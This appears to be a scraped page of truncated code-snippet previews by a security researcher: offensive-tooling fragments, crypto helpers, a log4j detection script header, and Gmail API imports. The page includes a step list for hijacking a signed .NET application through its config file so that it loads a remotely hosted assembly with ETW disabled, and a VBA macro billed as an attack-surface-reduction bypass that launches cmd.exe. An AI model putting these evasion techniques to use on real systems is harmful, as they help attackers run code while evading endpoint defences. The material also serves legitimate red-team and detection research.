byt3bl33d3r

<#
References:
    - https://docs.microsoft.com/en-us/dotnet/api/system.net.websockets.clientwebsocket?view=netframework-4.5
    - https://github.com/poshbotio/PoshBot/blob/master/PoshBot/Implementations/Slack/SlackConnection.ps1
    - https://www.leeholmes.com/blog/2018/09/05/producer-consumer-parallelism-in-powershell/
#>

$client_id = [System.GUID]::NewGuid()

$recv_queue = New-Object 'System.Collections.Concurrent.ConcurrentQueue[String]'

byt3bl33d3r

#! /usr/bin/env python3

# 
# Requires Python 3.7+ & aiohttp (speedups recommended)
# pip3 install aiohttp[speedups]
#

import sys
import asyncio
import aiohttp

byt3bl33d3r

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
3. Host test.dll on a remote SMB or HTTP(S) server

byt3bl33d3r

' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub

byt3bl33d3r

/*

Requires reference to System.Web.Extensions

*/

using System;
using System.Collections.Concurrent;
using System.Web.Script.Serialization;
using System.Text;

byt3bl33d3r

#[

    Author: Marcello Salvati, Twitter: @byt3bl33d3r
    License: BSD 3-Clause

    AES256-CTR Encryption/Decryption
]#

import nimcrypto
import nimcrypto/sysrand

byt3bl33d3r

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, padding
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from secrets import token_bytes


class DiffieHellman:
    def __init__(self):

byt3bl33d3r

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

byt3bl33d3r

#! /usr/bin/env python3

'''
    Needs Requests (pip3 install requests)

    Author: Marcello Salvati, Twitter: @byt3bl33d3r
    License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)

    
    This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.

byt3bl33d3r

from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup